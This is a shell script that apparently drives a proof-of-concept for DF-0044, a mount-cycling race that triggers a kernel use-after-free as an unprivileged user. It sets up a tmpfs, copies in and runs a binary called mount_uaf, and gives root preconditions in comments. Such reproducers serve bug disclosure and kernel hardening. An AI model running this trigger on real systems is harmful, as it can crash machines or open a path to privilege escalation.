#!/bin/sh
# DF-0044 run -- set up the cycled mount, host the binary inside it,
# and hammer the race as the unprivileged user.
#
# Pre-conditions on the guest (run as root once before this script):
#   sysctl vfs.usermount=1
#   mkdir -p /tmp/df0044/m
#   chown <user>:<user> /tmp/df0044/m
#   chmod 0755 /tmp/df0044/m
#
# Then as the unprivileged user:
#   ./build.sh && ./run.sh [SECS]
set -e
cd "$(dirname "$0")"

SECS="${1:-60}"
BASE=/tmp/df0044
MP=$BASE/m

mkdir -p "$MP"
chmod 0755 "$MP" 2>/dev/null || true

# Initial tmpfs to host the binary.  The cycler will overmount+unmount this
# path; the binary's text vp stays mapped on this initial mount, and
# /proc/self/map walks its path across the cycled mountpoint.
mount -t tmpfs dummy "$MP" 2>/dev/null || true
chmod 0755 "$MP"
cp -f mount_uaf "$MP/mount_uaf"
chmod 755 "$MP/mount_uaf"

cd "$MP"
echo "DF-0044: starting race for ${SECS}s ..."
./mount_uaf "$MP" "$SECS" 2
RC=$?
echo "DF-0044: rc=$RC"
exit $RC
